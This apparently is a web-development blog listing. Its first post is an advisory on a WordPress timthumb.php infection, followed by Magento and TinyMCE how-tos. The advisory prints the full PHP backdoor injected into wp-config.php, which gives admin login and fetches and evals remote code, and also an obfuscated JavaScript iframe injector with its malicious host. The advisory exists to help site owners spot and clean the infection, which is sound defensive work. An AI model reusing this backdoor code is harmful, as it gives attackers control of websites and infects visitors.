New WordPress Malware Attack Exploiting timthumb.php Script

There is a new malware infection that has been affecting thousands of WordPress sites that utilize popular timthumb.php image resizing script. Hackers create backdoor access in you website and inject malicious JavaScript that attempts to download various Trojans and malware on your visitor’s computers. At this stage of the infection attackers are also modifying two of WordPress core files /wp-config.php and /wp-includes/js/l10n.js The wp-config.php gets the following new lines of code that allows hackers backdoor access to your website: if (isset($_GET['pingnow'])&& isset($_GET['pass'])){ if ($_GET['pass'] == ’66f041e16a60928b05a7e228a89c3799′){ if ($_GET['pingnow']== ‘login’){ $user_login = ‘admin’; $user = get_userdatabylogin($user_login); $user_id = $user->ID; wp_set_current_user($user_id, $user_login); wp_set_auth_cookie($user_id); do_action(‘wp_login’, $user_login); } if (($_GET['pingnow']== ‘exec’)&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); $fnm = md5(rand(0,100)).’.php’; $fp = fopen($fnm, “w”); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_exec($ch); curl_close($ch); fclose($fp); echo “// ”; } if (($_GET['pingnow']== ‘eval’)&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $re = curl_exec($ch); curl_close($ch); eval($re); }}} The attackers also add the following code to your l10n.js file. var _0x4de4=["x64x20x35x28x29x7Bx62x20x30x3Dx32x2Ex63x28x22x33x22x29x3Bx32x2Ex39x2Ex36x28x30x29x3Bx30x2Ex37x3Dx27x33x27x3Bx30x2Ex31x2Ex61x3Dx27x34x27x3Bx30x2Ex31x2Ex6Bx3Dx27x34x27x3Bx30x2Ex69x3Dx27x66x3Ax2Fx2Fx67x2Dx68x2Ex6Dx2Fx6Ax2Ex65x27x7Dx38x28x35x2Cx6Cx29x3B","x7C","x73x70x6Cx69x74","x65x6Cx7Cx73x74x79x6Cx65x7Cx64x6Fx63x75x6Dx65x6Ex74x7Cx69x66x72x61x6Dx65x7Cx31x70x78x7Cx4Dx61x6Bx65x46x72x61x6Dx65x7Cx61x70x70x65x6Ex64x43x68x69x6Cx64x7Cx69x64x7Cx73x65x74x54x69x6Dx65x6Fx75x74x7Cx62x6Fx64x79x7Cx77x69x64x74x68x7Cx76x61x72x7Cx63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x7Cx66x75x6Ex63x74x69x6Fx6Ex7Cx70x68x70x7Cx68x74x74x70x7Cx63x6Fx75x6Ex74x65x72x7Cx77x6Fx72x64x70x72x65x73x73x7Cx73x72x63x7Cx66x72x61x6Dx65x7Cx68x65x69x67x68x74x7Cx31x30x30x30x7Cx63x6Fx6D","x72x65x70x6Cx61x63x65","","x5Cx77x2B","x5Cx62","x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{})); This appends an iframe to the bottom of your blog through which they can inject future malware: <iframe id="iframe" src="http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px; "></iframe> Solution Immediately remove or update the timthumb.php script.  When removing don’t forget to also update your theme files that rely on this functionality. Delete the cache folder located in the root of your template. Remove the code above from your wp-config.php file.  Normally, the last line of that file should read: require_once(ABSPATH . ‘wp-settings.php’); Remove the code above from the /wp-includes/js/l10n.js file. Update all WordPress and FTP passwords for good...

Read More »

Magento 1.5.0.1 – Problem Importing Images with Advanced DataFlow Profiles

Software Magento 1.5.0.1 Server Environment (dedicated) Lynix/Windows Apache PHP MySQL Problem Description After upgrading to 1.5.0.1 version of Magento, CSV-based import does not import images.  All other product information gets imported correctly, but images are being ignored. Workaround (solution pending) Upgrade to the latest version of Magento (at the moment it is ver. 1.5.1.0-beta1).  Create a new import profile just for images and bring them in separately. To do so follow the steps below: go to System > Import/Export > Dataflow – Profiles. Click Add New Profile. Setup a profile and select NO for “Original Magento attribute names in first row” (see attached screenshot) Map the fields to the ones in your CSV Save and Run the profile with your CSV As long as the product is already imported the image CSV can just have a sku, image, thumbnail, small_image fields. If the product does not exist, you’ll get an error on that line. Hope this helps...

Read More »

Magento 1.5.0.1 – SQLSTATE[42S02]: Base table or view not found…

Software Magento 1.5.0.1 Server Environment (dedicated) Lynix Apache PHP MySQL Problem Description When using  Insert Image function in Magento’s WYSIWYG,  Create Folder function results in the following error: SQLSTATE[42S02]: Base table or view not found: 1146 Table ‘colorado_soybu.magento_core_directory_storage’ doesn’t exist Solution The issue is caused by a missing “core_directory_storage” table.  To remedy you’ll need to run the following command on your MySQL database (please make sure that you replace “mag_” table prefix with your own): CREATE TABLE IF NOT EXISTS mag_core_directory_storage ( `directory_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL DEFAULT ”, `path` varchar(255) NOT NULL DEFAULT ”, `upload_time` TIMESTAMP DEFAULT CURRENT_TIMESTAMP, `parent_id` int(10) unsigned DEFAULT NULL, PRIMARY KEY (`directory_id`), UNIQUE KEY `IDX_DIRECTORY_PATH` (`name`, `path`), KEY `parent_id` (`parent_id`), CONSTRAINT `FK_DIRECTORY_PARENT_ID` FOREIGN KEY (`parent_id`) REFERENCES mag_core_directory_storage (`directory_id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT...

Read More »

WordPress and iFrames

iFrames are coming!  As you may have already noticed, your favorite video sharing websites like Vimeo & YouTube had begun introducing iFrame based syndication of their embeddable players.  While this offers a variety of new features, like iPad support for embedded videos, it might be very challenging for WordPress bloggers to insert iFrame-based code into their blog posts.  By default, such code would be filtered out by TinyMCE – WordPress’ WYSIWYG (or Rich Text) editor. Fear not, the solution is simple enough.  Just add the following code to the functions.php file of your template, and voilà – life is beautiful once more. function add_iframe($initArray) { $initArray['extended_valid_elements'] = "iframe[id|class|title|style|align|frameborder|height|longdesc|marginheight|marginwidth|name|scrolling|src|width]"; return $initArray; } add_filter('tiny_mce_before_init',...

Read More »